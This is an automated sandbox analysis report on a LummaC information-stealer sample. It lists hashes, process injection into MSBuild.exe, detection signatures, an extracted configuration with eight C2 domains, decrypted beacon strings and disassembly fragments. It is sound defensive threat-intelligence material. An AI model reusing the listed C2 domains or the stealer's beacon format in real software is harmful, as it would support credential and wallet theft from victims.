Edit tour

Windows Analysis Report
TuQlz67byH.exe

Overview

General Information

Sample name:	TuQlz67byH.exe renamed because original name is a hash value
Original sample name:	8e704acd1b0c26fdcfd0374d57fcb28e.exe
Analysis ID:	1528303
MD5:	8e704acd1b0c26fdcfd0374d57fcb28e
SHA1:	157b61a24087521693c8aca743d60e4c33cb803d
SHA256:	6c7818a65f46711fbc89cd7b548829e98be247fab8b2c4766c85b64bc632e797
Tags:	32exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: Silenttrinity Stager Msbuild Activity

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

TuQlz67byH.exe (PID: 3548 cmdline: "C:\Users\user\Desktop\TuQlz67byH.exe" MD5: 8E704ACD1B0C26FDCFD0374D57FCB28E)

MSBuild.exe (PID: 6420 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 2580 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 4548 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3548 -s 288 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["exilepolsiy.sbs", "invinjurhey.sbs", "isoplethui.sbs", "exemplarou.sbs", "laddyirekyi.sbs", "bemuzzeki.sbs", "frizzettei.sbs", "wickedneatr.sbs"], "Build id": "H8NgCl--"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.MSBuild.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.TuQlz67byH.exe.ec0000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 104.102.49.254, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 2580, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49708

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T18:47:25.590055+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49710	104.21.53.8	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T18:47:25.590055+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49710	104.21.53.8	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: TuQlz67byH.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/badges	URL Reputation: Label: malware

Found malware configuration

Source: 2.2.MSBuild.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["exilepolsiy.sbs", "invinjurhey.sbs", "isoplethui.sbs", "exemplarou.sbs", "laddyirekyi.sbs", "bemuzzeki.sbs", "frizzettei.sbs", "wickedneatr.sbs"], "Build id": "H8NgCl--"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: TuQlz67byH.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wickedneatr.sbs
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: invinjurhey.sbs
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: laddyirekyi.sbs
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: exilepolsiy.sbs
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: bemuzzeki.sbs
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: exemplarou.sbs
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: isoplethui.sbs
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: frizzettei.sbs
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: exemplarou.sbs
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: H8NgCl--

Source: TuQlz67byH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49758 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49761 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49763 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49764 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49805 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49824 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49823 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49825 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49826 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49827 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49833 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49855 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49863 version: TLS 1.2

Source: TuQlz67byH.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\TuQlz67byH.exe

Code function: 0_2_00ED9ABF FindFirstFileExW,

0_2_00ED9ABF

Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	0_2_00F1A0B9
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then movzx ebx, word ptr [ecx]	0_2_00F18051
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	0_2_00F082E8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh	0_2_00F343F8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00F0A3BF
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	0_2_00F2E318
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	0_2_00F345E8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00F28528
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	0_2_00F1A687
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00F1665F
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, ebx	0_2_00F0264D
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00F32601
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	0_2_00F307F8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	0_2_00F368A8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h	0_2_00F0C89C
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	0_2_00F0A86A
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then jmp dword ptr [0044FDB4h]	0_2_00F02849
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00F20813
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then jmp eax	0_2_00EFE9A5
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	0_2_00EF2928
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	0_2_00F2093D
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then jmp eax	0_2_00EFE914
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	0_2_00EFEAC6
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	0_2_00F14AD8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp+000006B8h]	0_2_00F0AA47
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	0_2_00F36A38
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00F36BB8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	0_2_00F36BB8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	0_2_00EFCB78
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00F20B43
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh	0_2_00F2CB36
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_00F20B22
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	0_2_00F1AC81
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+00h]	0_2_00EF8D88
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	0_2_00EFED6B
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00F12D48
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00F14D38
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then jmp eax	0_2_00F16EC4
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov word ptr [edx], 0000h	0_2_00F0CEB7
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then jmp ecx	0_2_00F32EAE
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	0_2_00F34E98
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00F34E98
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00F2CE48
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_00F00F6F
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then jmp ecx	0_2_00F32F6C
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh	0_2_00F1CF30
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	0_2_00F20F18
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esi+14h]	0_2_00F20F18
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	0_2_00F30F18
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov ebp, eax	0_2_00EF71D8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00F0F138
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov word ptr [esi], ax	0_2_00F0F138
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	0_2_00F1F2B8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	0_2_00F33290
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	0_2_00F193AF
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	0_2_00F33390
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]	0_2_00EF5468
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	0_2_00F0340E
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	0_2_00F1B56A
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00F0F540
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	0_2_00F336C7
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	0_2_00EF1878
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h	0_2_00F33833
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	0_2_00F15824
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	0_2_00F31918
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00F1DA58
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	0_2_00F19BA8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00F19BA8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h	0_2_00F19BA8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov word ptr [edx], ax	0_2_00F17B69
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then jmp eax	0_2_00F17B48
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	0_2_00F1BB20
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	0_2_00F03CBA
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00F35C62
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then jmp eax	0_2_00F15C1B
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00EFDDC4
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_00EF3D78
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov edi, ecx	0_2_00F01D02
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov ecx, dword ptr [edx]	0_2_00EEDED8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	0_2_00F03E69
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00EF9FE8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00EF9FE8
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	0_2_00F1FFD5
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then jmp ecx	0_2_00EF5FB0
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	0_2_00F1FF74
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 4x nop then dec ebx	0_2_00F2BF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0040D110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0040D110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	2_2_004463B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00445700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h	2_2_0044695B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_0040FCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	2_2_00444040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, dword ptr [edx]	2_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	2_2_00416F91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then dec ebx	2_2_0043F030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	2_2_00446094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	2_2_0042D1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_00422260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [esi], ax	2_2_00422260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	2_2_004142FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebp, eax	2_2_0040A300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	2_2_004323E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	2_2_004323E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	2_2_004323E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_004323E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	2_2_004323E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi+14h]	2_2_004323E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	2_2_00441440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0041D457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	2_2_0042C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	2_2_0042E40C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	2_2_0041B410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	2_2_004464B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00429510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh	2_2_00447520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	2_2_00416536
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]	2_2_00408590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_0043B650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	2_2_0042E66A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	2_2_00447710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	2_2_004467EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	2_2_0042D7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_004228E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_0041D961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	2_2_00443920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	2_2_004499D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	2_2_004049A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	2_2_00444A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	2_2_00405A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	2_2_00411A3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	2_2_00411ACD
